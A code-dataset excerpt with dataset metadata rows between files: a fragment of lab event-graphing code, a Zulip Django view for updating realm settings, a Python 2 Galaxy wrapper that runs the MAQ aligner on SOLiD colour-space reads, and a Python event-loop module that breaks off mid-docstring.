GraphLib.drawXaxis(aCanvas, x_zero, y_zero, x_pixel_width, max_x_scale, x_divisions)
GraphLib.eventRecord(aCanvas, x_zero, topRow, x_pixel_width, max_x_scale, aRecord.datalist, ["T","t"], "L1 Trial")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing), x_pixel_width, max_x_scale, aRecord.datalist, ["=","."], "Lever 1")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*2), x_pixel_width, max_x_scale, aRecord.datalist, ["L"], "L1 Resp")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*3), x_pixel_width, max_x_scale, aRecord.datalist, [">"], "L1 inactive")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*4), x_pixel_width, max_x_scale, aRecord.datalist, ["J"], "L2 active")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*5), x_pixel_width, max_x_scale, aRecord.datalist, ["<"], "L2 inactive")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*6), x_pixel_width, max_x_scale, aRecord.datalist, ["P","p"], "Pump")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*7), x_pixel_width, max_x_scale, aRecord.datalist, ["S","s"], "Stim")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*8), x_pixel_width, max_x_scale, aRecord.datalist, ["C","c"], "Stim 2")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*9), x_pixel_width, max_x_scale, aRecord.datalist, ["O","o"], "TimeOut")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*10), x_pixel_width, max_x_scale, aRecord.datalist, ["Z","z"], "HD Trial")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*11), x_pixel_width, max_x_scale, aRecord.datalist, ["~",","], "Lever 2")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*12), x_pixel_width, max_x_scale, aRecord.datalist, ["H","h"], "HD Resp")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*13), x_pixel_width, max_x_scale, aRecord.datalist, ["B","b"], "Block")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*14), x_pixel_width, max_x_scale, aRecord.datalist, ["I","i"], "IBI")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*15), x_pixel_width, max_x_scale, aRecord.datalist, ["G","E"], "Session")
aCanvas.create_text(15, topRow+(spacing*16)+4, fill="red", text="Errors", anchor = "w")
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*18), x_pixel_width, max_x_scale, aRecord.datalist, ["@"], "@ Input", t_zero = startTime)
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*19), x_pixel_width, max_x_scale, aRecord.datalist, ["#"], "# Recover", t_zero = startTime)
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*20), x_pixel_width, max_x_scale, aRecord.datalist, ["$"], "$ Output", t_zero = startTime)
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*21), x_pixel_width, max_x_scale, aRecord.datalist, ["%"], "% Recover", t_zero = startTime)
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*22), x_pixel_width, max_x_scale, aRecord.datalist, ["&"], "& Reset", t_zero = startTime)
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*23), x_pixel_width, max_x_scale, aRecord.datalist, ["!"], "! Abort",t_zero = startTime)
GraphLib.eventRecord(aCanvas, x_zero, topRow+(spacing*24), x_pixel_width, max_x_scale, aRecord.datalist, ["("], "( Safe",t_zero = startTime)
"""
def drawCumulativeRecord(aRecord,aCanvas):
print("drawCumulativeRecord called")
"""
|
gpl-3.0
| 3,189,540,916,714,370,600
| 44.063333
| 169
| 0.629558
| false
| 2.907937
| false
| false
| false
|
punchagan/zulip
|
zerver/views/realm.py
|
2
|
12881
|
from typing import Any, Dict, Optional, Union
from django.core.exceptions import ValidationError
from django.http import HttpRequest, HttpResponse
from django.shortcuts import render
from django.utils.translation import gettext as _
from django.views.decorators.http import require_safe
from confirmation.models import Confirmation, ConfirmationKeyException, get_object_from_key
from zerver.decorator import require_realm_admin, require_realm_owner
from zerver.forms import check_subdomain_available as check_subdomain
from zerver.lib.actions import (
do_deactivate_realm,
do_reactivate_realm,
do_set_realm_authentication_methods,
do_set_realm_message_editing,
do_set_realm_notifications_stream,
do_set_realm_property,
do_set_realm_signup_notifications_stream,
)
from zerver.lib.exceptions import OrganizationOwnerRequired
from zerver.lib.i18n import get_available_language_codes
from zerver.lib.request import REQ, JsonableError, has_request_variables
from zerver.lib.response import json_error, json_success
from zerver.lib.retention import parse_message_retention_days
from zerver.lib.streams import access_stream_by_id
from zerver.lib.validator import (
check_bool,
check_capped_string,
check_dict,
check_int,
check_int_in,
check_string_or_int,
to_non_negative_int,
)
from zerver.models import Realm, UserProfile
@require_realm_admin
@has_request_variables
def update_realm(
request: HttpRequest,
user_profile: UserProfile,
name: Optional[str] = REQ(
str_validator=check_capped_string(Realm.MAX_REALM_NAME_LENGTH), default=None
),
description: Optional[str] = REQ(
str_validator=check_capped_string(Realm.MAX_REALM_DESCRIPTION_LENGTH), default=None
),
emails_restricted_to_domains: Optional[bool] = REQ(json_validator=check_bool, default=None),
disallow_disposable_email_addresses: Optional[bool] = REQ(
json_validator=check_bool, default=None
),
invite_required: Optional[bool] = REQ(json_validator=check_bool, default=None),
invite_to_realm_policy: Optional[int] = REQ(
json_validator=check_int_in(Realm.COMMON_POLICY_TYPES), default=None
),
name_changes_disabled: Optional[bool] = REQ(json_validator=check_bool, default=None),
email_changes_disabled: Optional[bool] = REQ(json_validator=check_bool, default=None),
avatar_changes_disabled: Optional[bool] = REQ(json_validator=check_bool, default=None),
inline_image_preview: Optional[bool] = REQ(json_validator=check_bool, default=None),
inline_url_embed_preview: Optional[bool] = REQ(json_validator=check_bool, default=None),
add_emoji_by_admins_only: Optional[bool] = REQ(json_validator=check_bool, default=None),
allow_message_deleting: Optional[bool] = REQ(json_validator=check_bool, default=None),
message_content_delete_limit_seconds: Optional[int] = REQ(
converter=to_non_negative_int, default=None
),
allow_message_editing: Optional[bool] = REQ(json_validator=check_bool, default=None),
allow_community_topic_editing: Optional[bool] = REQ(json_validator=check_bool, default=None),
mandatory_topics: Optional[bool] = REQ(json_validator=check_bool, default=None),
message_content_edit_limit_seconds: Optional[int] = REQ(
converter=to_non_negative_int, default=None
),
allow_edit_history: Optional[bool] = REQ(json_validator=check_bool, default=None),
default_language: Optional[str] = REQ(default=None),
waiting_period_threshold: Optional[int] = REQ(converter=to_non_negative_int, default=None),
authentication_methods: Optional[Dict[str, Any]] = REQ(
json_validator=check_dict([]), default=None
),
notifications_stream_id: Optional[int] = REQ(json_validator=check_int, default=None),
signup_notifications_stream_id: Optional[int] = REQ(json_validator=check_int, default=None),
message_retention_days_raw: Optional[Union[int, str]] = REQ(
"message_retention_days", json_validator=check_string_or_int, default=None
),
send_welcome_emails: Optional[bool] = REQ(json_validator=check_bool, default=None),
digest_emails_enabled: Optional[bool] = REQ(json_validator=check_bool, default=None),
message_content_allowed_in_email_notifications: Optional[bool] = REQ(
json_validator=check_bool, default=None
),
bot_creation_policy: Optional[int] = REQ(
json_validator=check_int_in(Realm.BOT_CREATION_POLICY_TYPES), default=None
),
create_stream_policy: Optional[int] = REQ(
json_validator=check_int_in(Realm.COMMON_POLICY_TYPES), default=None
),
invite_to_stream_policy: Optional[int] = REQ(
json_validator=check_int_in(Realm.COMMON_POLICY_TYPES), default=None
),
move_messages_between_streams_policy: Optional[int] = REQ(
json_validator=check_int_in(Realm.COMMON_POLICY_TYPES), default=None
),
user_group_edit_policy: Optional[int] = REQ(
json_validator=check_int_in(Realm.USER_GROUP_EDIT_POLICY_TYPES), default=None
),
private_message_policy: Optional[int] = REQ(
json_validator=check_int_in(Realm.PRIVATE_MESSAGE_POLICY_TYPES), default=None
),
wildcard_mention_policy: Optional[int] = REQ(
json_validator=check_int_in(Realm.WILDCARD_MENTION_POLICY_TYPES), default=None
),
email_address_visibility: Optional[int] = REQ(
json_validator=check_int_in(Realm.EMAIL_ADDRESS_VISIBILITY_TYPES), default=None
),
default_twenty_four_hour_time: Optional[bool] = REQ(json_validator=check_bool, default=None),
video_chat_provider: Optional[int] = REQ(json_validator=check_int, default=None),
giphy_rating: Optional[int] = REQ(json_validator=check_int, default=None),
default_code_block_language: Optional[str] = REQ(default=None),
digest_weekday: Optional[int] = REQ(
json_validator=check_int_in(Realm.DIGEST_WEEKDAY_VALUES), default=None
),
) -> HttpResponse:
realm = user_profile.realm
# Additional validation/error checking beyond types go here, so
# the entire request can succeed or fail atomically.
if default_language is not None and default_language not in get_available_language_codes():
raise JsonableError(_("Invalid language '{}'").format(default_language))
if authentication_methods is not None:
if not user_profile.is_realm_owner:
raise OrganizationOwnerRequired()
if True not in list(authentication_methods.values()):
return json_error(_("At least one authentication method must be enabled."))
if video_chat_provider is not None and video_chat_provider not in {
p["id"] for p in Realm.VIDEO_CHAT_PROVIDERS.values()
}:
return json_error(_("Invalid video_chat_provider {}").format(video_chat_provider))
if giphy_rating is not None and giphy_rating not in {
p["id"] for p in Realm.GIPHY_RATING_OPTIONS.values()
}:
return json_error(_("Invalid giphy_rating {}").format(giphy_rating))
message_retention_days: Optional[int] = None
if message_retention_days_raw is not None:
if not user_profile.is_realm_owner:
raise OrganizationOwnerRequired()
realm.ensure_not_on_limited_plan()
message_retention_days = parse_message_retention_days(
message_retention_days_raw, Realm.MESSAGE_RETENTION_SPECIAL_VALUES_MAP
)
    # The use of `locals()` here is a bit of a code smell, but it's
# restricted to the elements present in realm.property_types.
#
# TODO: It should be possible to deduplicate this function up
# further by some more advanced usage of the
# `REQ/has_request_variables` extraction.
req_vars = {k: v for k, v in list(locals().items()) if k in realm.property_types}
data: Dict[str, Any] = {}
for k, v in list(req_vars.items()):
if v is not None and getattr(realm, k) != v:
do_set_realm_property(realm, k, v, acting_user=user_profile)
if isinstance(v, str):
data[k] = "updated"
else:
data[k] = v
# The following realm properties do not fit the pattern above
# authentication_methods is not supported by the do_set_realm_property
# framework because of its bitfield.
if authentication_methods is not None and (
realm.authentication_methods_dict() != authentication_methods
):
do_set_realm_authentication_methods(realm, authentication_methods, acting_user=user_profile)
data["authentication_methods"] = authentication_methods
# The message_editing settings are coupled to each other, and thus don't fit
# into the do_set_realm_property framework.
if (
(allow_message_editing is not None and realm.allow_message_editing != allow_message_editing)
or (
message_content_edit_limit_seconds is not None
and realm.message_content_edit_limit_seconds != message_content_edit_limit_seconds
)
or (
allow_community_topic_editing is not None
and realm.allow_community_topic_editing != allow_community_topic_editing
)
):
if allow_message_editing is None:
allow_message_editing = realm.allow_message_editing
if message_content_edit_limit_seconds is None:
message_content_edit_limit_seconds = realm.message_content_edit_limit_seconds
if allow_community_topic_editing is None:
allow_community_topic_editing = realm.allow_community_topic_editing
do_set_realm_message_editing(
realm,
allow_message_editing,
message_content_edit_limit_seconds,
allow_community_topic_editing,
acting_user=user_profile,
)
data["allow_message_editing"] = allow_message_editing
data["message_content_edit_limit_seconds"] = message_content_edit_limit_seconds
data["allow_community_topic_editing"] = allow_community_topic_editing
# Realm.notifications_stream and Realm.signup_notifications_stream are not boolean,
# str or integer field, and thus doesn't fit into the do_set_realm_property framework.
if notifications_stream_id is not None:
if realm.notifications_stream is None or (
realm.notifications_stream.id != notifications_stream_id
):
new_notifications_stream = None
if notifications_stream_id >= 0:
(new_notifications_stream, sub) = access_stream_by_id(
user_profile, notifications_stream_id
)
do_set_realm_notifications_stream(
realm, new_notifications_stream, notifications_stream_id, acting_user=user_profile
)
data["notifications_stream_id"] = notifications_stream_id
if signup_notifications_stream_id is not None:
if realm.signup_notifications_stream is None or (
realm.signup_notifications_stream.id != signup_notifications_stream_id
):
new_signup_notifications_stream = None
if signup_notifications_stream_id >= 0:
(new_signup_notifications_stream, sub) = access_stream_by_id(
user_profile, signup_notifications_stream_id
)
do_set_realm_signup_notifications_stream(
realm,
new_signup_notifications_stream,
signup_notifications_stream_id,
acting_user=user_profile,
)
data["signup_notifications_stream_id"] = signup_notifications_stream_id
if default_code_block_language is not None:
# Migrate '', used in the API to encode the default/None behavior of this feature.
if default_code_block_language == "":
data["default_code_block_language"] = None
else:
data["default_code_block_language"] = default_code_block_language
return json_success(data)
@require_realm_owner
@has_request_variables
def deactivate_realm(request: HttpRequest, user: UserProfile) -> HttpResponse:
realm = user.realm
do_deactivate_realm(realm, acting_user=user)
return json_success()
@require_safe
def check_subdomain_available(request: HttpRequest, subdomain: str) -> HttpResponse:
try:
check_subdomain(subdomain)
return json_success({"msg": "available"})
except ValidationError as e:
return json_success({"msg": e.message})
def realm_reactivation(request: HttpRequest, confirmation_key: str) -> HttpResponse:
try:
realm = get_object_from_key(confirmation_key, Confirmation.REALM_REACTIVATION)
except ConfirmationKeyException:
return render(request, "zerver/realm_reactivation_link_error.html")
do_reactivate_realm(realm)
context = {"realm": realm}
return render(request, "zerver/realm_reactivation.html", context)
|
apache-2.0
| -8,273,240,410,386,260,000
| 46.18315
| 100
| 0.68799
| false
| 3.795227
| false
| false
| false
|
volpino/Yeps-EURAC
|
tools/solid_tools/maq_cs_wrapper.py
|
1
|
12127
|
#! /usr/bin/python
#Guruprasad Ananda
#MAQ mapper for SOLiD colourspace-reads
import sys, os, zipfile, tempfile, subprocess
def stop_err( msg ):
sys.stderr.write( "%s\n" % msg )
sys.exit()
def __main__():
out_fname = sys.argv[1].strip()
out_f2 = open(sys.argv[2].strip(),'r+')
ref_fname = sys.argv[3].strip()
f3_read_fname = sys.argv[4].strip()
f3_qual_fname = sys.argv[5].strip()
paired = sys.argv[6]
if paired == 'yes':
r3_read_fname = sys.argv[7].strip()
r3_qual_fname = sys.argv[8].strip()
min_mapqual = int(sys.argv[9].strip())
max_mismatch = int(sys.argv[10].strip())
out_f3name = sys.argv[11].strip()
subprocess_dict = {}
ref_csfa = tempfile.NamedTemporaryFile()
ref_bfa = tempfile.NamedTemporaryFile()
ref_csbfa = tempfile.NamedTemporaryFile()
cmd2_1 = 'maq fasta2csfa %s > %s 2>&1' %(ref_fname,ref_csfa.name)
cmd2_2 = 'maq fasta2bfa %s %s 2>&1' %(ref_csfa.name,ref_csbfa.name)
cmd2_3 = 'maq fasta2bfa %s %s 2>&1' %(ref_fname,ref_bfa.name)
try:
os.system(cmd2_1)
os.system(cmd2_2)
os.system(cmd2_3)
except Exception, erf:
stop_err(str(erf)+"Error processing reference sequence")
if paired == 'yes': #paired end reads
tmpf = tempfile.NamedTemporaryFile() #forward reads
tmpr = tempfile.NamedTemporaryFile() #reverse reads
tmps = tempfile.NamedTemporaryFile() #single reads
tmpffastq = tempfile.NamedTemporaryFile()
tmprfastq = tempfile.NamedTemporaryFile()
tmpsfastq = tempfile.NamedTemporaryFile()
cmd1 = "solid2fastq_modified.pl 'yes' %s %s %s %s %s %s %s 2>&1" %(tmpf.name,tmpr.name,tmps.name,f3_read_fname,f3_qual_fname,r3_read_fname,r3_qual_fname)
try:
os.system(cmd1)
os.system('gunzip -c %s >> %s' %(tmpf.name,tmpffastq.name))
os.system('gunzip -c %s >> %s' %(tmpr.name,tmprfastq.name))
os.system('gunzip -c %s >> %s' %(tmps.name,tmpsfastq.name))
except Exception, eq:
stop_err("Error converting data to fastq format." + str(eq))
#make a temp directory where the split fastq files will be stored
try:
split_dir = tempfile.mkdtemp()
split_file_prefix_f = tempfile.mktemp(dir=split_dir)
split_file_prefix_r = tempfile.mktemp(dir=split_dir)
splitcmd_f = 'split -a 2 -l %d %s %s' %(32000000,tmpffastq.name,split_file_prefix_f) #32M lines correspond to 8M reads
splitcmd_r = 'split -a 2 -l %d %s %s' %(32000000,tmprfastq.name,split_file_prefix_r) #32M lines correspond to 8M reads
os.system(splitcmd_f)
os.system(splitcmd_r)
os.chdir(split_dir)
ii = 0
for fastq in os.listdir(split_dir):
if not fastq.startswith(split_file_prefix_f.split("/")[-1]):
continue
                fastq_r = split_file_prefix_r + fastq.split(split_file_prefix_f.split("/")[-1])[1] #find the reverse strand fastq corresponding to the forward strand fastq
tmpbfq_f = tempfile.NamedTemporaryFile()
tmpbfq_r = tempfile.NamedTemporaryFile()
cmd3 = 'maq fastq2bfq %s %s 2>&1; maq fastq2bfq %s %s 2>&1; maq map -c %s.csmap %s %s %s 1>/dev/null 2>&1; maq mapview %s.csmap > %s.txt' %(fastq,tmpbfq_f.name,fastq_r,tmpbfq_r.name,fastq,ref_csbfa.name,tmpbfq_f.name,tmpbfq_r.name,fastq,fastq)
subprocess_dict['sp'+str(ii+1)] = subprocess.Popen([cmd3],shell=True,stdout=subprocess.PIPE)
ii += 1
while True:
all_done = True
for j,k in enumerate(subprocess_dict.keys()):
if subprocess_dict['sp'+str(j+1)].wait() != 0:
err = subprocess_dict['sp'+str(j+1)].communicate()[1]
if err != None:
stop_err("Mapping error: %s" %err)
all_done = False
if all_done:
break
cmdout = "for map in *.txt; do cat $map >> %s; done" %(out_fname)
os.system(cmdout)
tmpcsmap = tempfile.NamedTemporaryFile()
cmd_cat_csmap = "for csmap in *.csmap; do cat $csmap >> %s; done" %(tmpcsmap.name)
os.system(cmd_cat_csmap)
tmppileup = tempfile.NamedTemporaryFile()
cmdpileup = "maq pileup -m %s -q %s %s %s > %s" %(max_mismatch,min_mapqual,ref_bfa.name,tmpcsmap.name,tmppileup.name)
os.system(cmdpileup)
tmppileup.seek(0)
print >> out_f2, "#chr\tposition\tref_nt\tcoverage\tSNP_count\tA_count\tT_count\tG_count\tC_count"
for line in file(tmppileup.name):
elems = line.strip().split()
ref_nt = elems[2].capitalize()
read_nt = elems[4]
coverage = int(elems[3])
a,t,g,c = 0,0,0,0
ref_nt_count = 0
for ch in read_nt:
ch = ch.capitalize()
if ch not in ['A','T','G','C',',','.']:
continue
if ch in [',','.']:
ch = ref_nt
ref_nt_count += 1
try:
nt_ind = ['A','T','G','C'].index(ch)
if nt_ind == 0:
a+=1
elif nt_ind == 1:
t+=1
elif nt_ind == 2:
g+=1
else:
c+=1
except ValueError, we:
print >>sys.stderr, we
print >> out_f2, "%s\t%s\t%s\t%s\t%s\t%s" %("\t".join(elems[:4]),coverage-ref_nt_count,a,t,g,c)
except Exception, er2:
stop_err("Encountered error while mapping: %s" %(str(er2)))
else: #single end reads
tmpf = tempfile.NamedTemporaryFile()
tmpfastq = tempfile.NamedTemporaryFile()
cmd1 = "solid2fastq_modified.pl 'no' %s %s %s %s %s %s %s 2>&1" %(tmpf.name,None,None,f3_read_fname,f3_qual_fname,None,None)
try:
os.system(cmd1)
os.system('gunzip -c %s >> %s' %(tmpf.name,tmpfastq.name))
tmpf.close()
except:
stop_err("Error converting data to fastq format.")
#make a temp directory where the split fastq files will be stored
try:
split_dir = tempfile.mkdtemp()
split_file_prefix = tempfile.mktemp(dir=split_dir)
splitcmd = 'split -a 2 -l %d %s %s' %(32000000,tmpfastq.name,split_file_prefix) #32M lines correspond to 8M reads
os.system(splitcmd)
os.chdir(split_dir)
for i,fastq in enumerate(os.listdir(split_dir)):
tmpbfq = tempfile.NamedTemporaryFile()
cmd3 = 'maq fastq2bfq %s %s 2>&1; maq map -c %s.csmap %s %s 1>/dev/null 2>&1; maq mapview %s.csmap > %s.txt' %(fastq,tmpbfq.name,fastq,ref_csbfa.name,tmpbfq.name,fastq,fastq)
subprocess_dict['sp'+str(i+1)] = subprocess.Popen([cmd3],shell=True,stdout=subprocess.PIPE)
while True:
all_done = True
for j,k in enumerate(subprocess_dict.keys()):
if subprocess_dict['sp'+str(j+1)].wait() != 0:
err = subprocess_dict['sp'+str(j+1)].communicate()[1]
if err != None:
stop_err("Mapping error: %s" %err)
all_done = False
if all_done:
break
cmdout = "for map in *.txt; do cat $map >> %s; done" %(out_fname)
os.system(cmdout)
tmpcsmap = tempfile.NamedTemporaryFile()
cmd_cat_csmap = "for csmap in *.csmap; do cat $csmap >> %s; done" %(tmpcsmap.name)
os.system(cmd_cat_csmap)
tmppileup = tempfile.NamedTemporaryFile()
cmdpileup = "maq pileup -m %s -q %s %s %s > %s" %(max_mismatch,min_mapqual,ref_bfa.name,tmpcsmap.name,tmppileup.name)
os.system(cmdpileup)
tmppileup.seek(0)
print >> out_f2, "#chr\tposition\tref_nt\tcoverage\tSNP_count\tA_count\tT_count\tG_count\tC_count"
for line in file(tmppileup.name):
elems = line.strip().split()
ref_nt = elems[2].capitalize()
read_nt = elems[4]
coverage = int(elems[3])
a,t,g,c = 0,0,0,0
ref_nt_count = 0
for ch in read_nt:
ch = ch.capitalize()
if ch not in ['A','T','G','C',',','.']:
continue
if ch in [',','.']:
ch = ref_nt
ref_nt_count += 1
try:
nt_ind = ['A','T','G','C'].index(ch)
if nt_ind == 0:
a+=1
elif nt_ind == 1:
t+=1
elif nt_ind == 2:
g+=1
else:
c+=1
except:
pass
print >> out_f2, "%s\t%s\t%s\t%s\t%s\t%s" %("\t".join(elems[:4]),coverage-ref_nt_count,a,t,g,c)
except Exception, er2:
stop_err("Encountered error while mapping: %s" %(str(er2)))
#Build custom track from pileup
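# The per-base counts written above are turned into five UCSC wiggle
# (variableStep) tracks: overall coverage plus the percentage of reads
# calling A, T, G and C at each covered position.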
chr_list=[]
out_f2.seek(0)
fcov = tempfile.NamedTemporaryFile()
fout_a = tempfile.NamedTemporaryFile()
fout_t = tempfile.NamedTemporaryFile()
fout_g = tempfile.NamedTemporaryFile()
fout_c = tempfile.NamedTemporaryFile()
fcov.write('''track type=wiggle_0 name="Coverage track" description="Coverage track (from Galaxy)" color=0,0,0 visibility=2\n''')
fout_a.write('''track type=wiggle_0 name="Track A" description="Track A (from Galaxy)" color=255,0,0 visibility=2\n''')
fout_t.write('''track type=wiggle_0 name="Track T" description="Track T (from Galaxy)" color=0,255,0 visibility=2\n''')
fout_g.write('''track type=wiggle_0 name="Track G" description="Track G (from Galaxy)" color=0,0,255 visibility=2\n''')
fout_c.write('''track type=wiggle_0 name="Track C" description="Track C (from Galaxy)" color=255,0,255 visibility=2\n''')
for line in out_f2:
if line.startswith("#"):
continue
elems = line.split()
chr = elems[0]
if chr not in chr_list:
chr_list.append(chr)
if not (chr.startswith('chr') or chr.startswith('scaffold')):
chr = 'chr' + chr
header = "variableStep chrom=%s" %(chr)
fcov.write("%s\n" %(header))
fout_a.write("%s\n" %(header))
fout_t.write("%s\n" %(header))
fout_g.write("%s\n" %(header))
fout_c.write("%s\n" %(header))
try:
pos = int(elems[1])
cov = int(elems[3])
a = int(elems[5])
t = int(elems[6])
g = int(elems[7])
c = int(elems[8])
except:
continue
fcov.write("%s\t%s\n" %(pos,cov))
try:
a_freq = a*100./cov
t_freq = t*100./cov
g_freq = g*100./cov
c_freq = c*100./cov
except ZeroDivisionError:
a_freq=t_freq=g_freq=c_freq=0
fout_a.write("%s\t%s\n" %(pos,a_freq))
fout_t.write("%s\t%s\n" %(pos,t_freq))
fout_g.write("%s\t%s\n" %(pos,g_freq))
fout_c.write("%s\t%s\n" %(pos,c_freq))
fcov.seek(0)
fout_a.seek(0)
fout_g.seek(0)
fout_t.seek(0)
fout_c.seek(0)
os.system("cat %s %s %s %s %s | cat > %s" %(fcov.name,fout_a.name,fout_t.name,fout_g.name,fout_c.name,out_f3name))
if __name__=="__main__":
__main__()
|
mit
| 8,546,402,300,464,318,000
| 43.914815
| 259
| 0.504247
| false
| 3.394067
| false
| false
| false
|
SimonSapin/snippets
|
event_loop/event_loop.py
|
1
|
11983
|
"""
If an application needs to wait for various events and polling is not
possible or desirable, one solution is to use a blocking threads for each
events. However, multi-threading comes with its pitfalls and problems.
This event loop is a framework that allows an application to wait for
various events without using threads. Currently supported events are
files being ready for reading and timers (repeating or not).
The heart of the loop is basically `select.select()` with a well-chosen
timeout.
See http://exyr.org/2011/event-loop/
Author: Simon Sapin
License: BSD
"""
import sys
import os
import time
import itertools
import select
import decimal
# float('inf') is only officially supported from Python 2.6, while decimal
# is there since 2.4.
Infinity = decimal.Decimal('Infinity')
class Timer(object):
"""
Create a new timer.
If its `run()` method is called often enough, `callback` will be called
(without parameters) `interval` seconds from now (may be a floating point
number) and, if `repeat` is true, every `interval` seconds after that.
There is no thread or other form of preemption: the callback won't be
called if `run()` is not.
A repeating timer may miss a few beats if `run()` is not called for more
than one interval, but it stays scheduled for whole numbers of intervals
after it was created or reset. See the tests for examples.
"""
@classmethod
def decorate(cls, *args, **kwargs):
"""
Decorator factory:
@Timer.decorate(1, repeat=True)
def every_second():
# ...
The decorated function is replaced by the Timer object so you can
write eg.
every_second.cancel()
"""
def decorator(callback):
return cls(callback, *args, **kwargs)
return decorator
def __init__(self, callback, interval, repeat=False,
_time_function=time.time):
# `_time_function` is meant as a dependency injection for testing.
assert interval > 0
self._callback = callback
self._interval = interval
self._repeat = repeat
self._now = _time_function
self.reset()
def reset(self):
"""
Cancel currently scheduled expiry and start again as if the timer
was created just now.
"""
self._expiry = self._now() + self._interval
def cancel(self):
"""Cancel the timer. The same timer object should not be used again."""
self._expiry = None
def __call__(self):
"""Decorated callbacks can still be called at any time."""
self._callback()
def run(self):
"""
Return whether the timer will trigger again. (Repeating or not expired
yet.)
"""
if self._expiry is None:
return False
if self._now() < self._expiry:
return True
if self._repeat:
# Would have expired that many times since last run().
times = (self._now() - self._expiry) // self._interval + 1
self._expiry += times * self._interval
else:
self._expiry = None
# Leave a chance to the callback to call `reset()`.
self()
return self._expiry is not None
def sleep_time(self):
"""
Return the amount of time before `run()` does anything, or
Decimal('Infinity') for a canceled or expired non-repeating timer.
"""
if self._expiry is None:
return Infinity
else:
return max(self._expiry - self._now(), 0)
class TimerManager(object):
"""
TimerManager handle multiple timers.
Not thread-safe, but the point is to avoid threads anyway.
"""
def __init__(self, _time_function=time.time):
"""
`_time_function` is meant as a dependency injection for testing.
"""
self._timers = []
self._time_function = _time_function
def add_timer(self, timeout, callback, repeat=False):
"""
Add a timer with `callback`, expiring `timeout` seconds from now and,
if `repeat` is true, every `timeout` seconds after that.
"""
timer = Timer(callback, timeout, repeat=repeat,
_time_function= self._time_function)
self._timers.append(timer)
return timer
def run(self):
"""
Call without arguments the callback of every expired timer.
Each callback is called at most once, even if a repeating timer
expired several times since last time `run()` was called.
"""
# Run all timers and remove those who won't trigger again.
self._timers = [timer for timer in self._timers if timer.run()]
def sleep_time(self):
"""
How much time you can wait before `run()` does something.
Return None if no timer is registered.
"""
return min(itertools.chain(
# Have at least one element. min() raises on empty sequences.
[Infinity],
(timer.sleep_time() for timer in self._timers)
))
class EventLoop(object):
"""
Manage callback functions to be called on certain events.
Currently supported events are:
* Timers (same as TimerManager)
* File descriptors ready for reading. (Waited for using `select.select()`)
"""
def __init__(self):
self._timers = TimerManager()
self._readers = {}
def add_timer(self, timeout, repeat=False):
"""
Decorator factory for adding a timer:
@loop.add_timer(1)
def one_second_from_now():
# callback code
"""
def decorator(callback):
return self._timers.add_timer(timeout, callback, repeat)
return decorator
def watch_for_reading(self, file_descriptor):
"""
Decorator factory for watching a file descriptor. When the file
descriptor is ready for reading, it is passed as a parameter to
the decorated callback.
Takes either a file descriptor (integer) or a file object with a
`fileno()` method that returns one.
@loop.watch_for_reading(sys.stdin)
def stdin_ready(fd):
data = os.read(fd, 255)
# ...
Use `os.read()` instead of `some_file.read()` to read just what is
available and avoid blocking, without the file actually being in
non-blocking mode.
"""
if not isinstance(file_descriptor, (int, long)):
file_descriptor = file_descriptor.fileno()
def decorator(callback):
self._readers[file_descriptor] = callback
return callback
return decorator
def block_reader(self, file_descriptor, max_block_size=8 * 1024):
"""
Decorator factory. As soon as some data is available for reading on
the file descriptor, the decorated callback is called with a block
of up to `max_block_size` bytes.
If data comes slowly, blocks will be smaller than max_block_size and
contain just what can be read without blocking. In that case, the value
of max_block_size does not matter.
"""
def decorator(callback):
@self.watch_for_reading(file_descriptor)
def reader(fd):
# According to `select.select()` there is some data,
# so os.read() won't block.
data = os.read(fd, max_block_size)
callback(data)
return callback
return decorator
def push_back_reader(self, file_descriptor, max_block_size=8 * 1024):
"""
Just like block_reader, but allows you to push data "back into the file".
Callbacks get a `push_back` function as a second parameter. You can
push back the data you don't want to use yet.
Example use case: you get some data in a block, but you need more
before it is useful or meaningful. You can push it back instead of
keeping track of it yourself.
On the next call, the data you pushed back will be prepended to the
next block, in the order it was pushed.
"""
def decorator(callback):
pushed_back = []
@self.block_reader(file_descriptor, max_block_size)
def reader(data):
if pushed_back:
pushed_back.append(data)
data = ''.join(pushed_back)
pushed_back[:] = []
callback(data, pushed_back.append)
return callback
return decorator
def line_reader(self, file_descriptor, max_block_size=8 * 1024):
r"""
Decorator factory. The decorated callback is called once with
every line (terminated by '\n') as they become available.
Just like with `some_file.readline()`, the trailing newline character
is included.
The `max_block_size` parameter is just passed to `block_reader()`.
"""
# line_reader could be implemented with push_back_reader, but not doing
# so allows us to only search new data for the newline character.
def decorator(callback):
partial_line_fragments = []
@self.block_reader(file_descriptor, max_block_size)
def reader(data):
# Loop since there could be more than one line in one block.
while 1:
try:
end = data.index('\n')
except ValueError:
# no newline here
break
else:
end += 1 # include the newline char
partial_line_fragments.append(data[:end])
line = ''.join(partial_line_fragments)
partial_line_fragments[:] = []
callback(line)
data = data[end:]
if data:
partial_line_fragments.append(data)
return callback
return decorator
def run(self):
"""
Run the event loop. Wait for events, call callbacks when events happen,
and only return when `stop()` is called.
"""
self._running = True
while self._running:
timeout = self._timers.sleep_time()
if timeout == Infinity:
timeout = None
if self._readers:
ready, _, _ = select.select(
self._readers.keys(), [], [], timeout)
else:
assert timeout is not None, 'Running without any event'
# Some systems do not like 3 empty lists for select()
time.sleep(timeout)
ready = []
self._timers.run()
for fd in ready:
self._readers[fd](fd)
def stop(self):
"""
Signal the event loop to stop before doing another iteration.
Since the point of the event loop is to avoid threads, this will
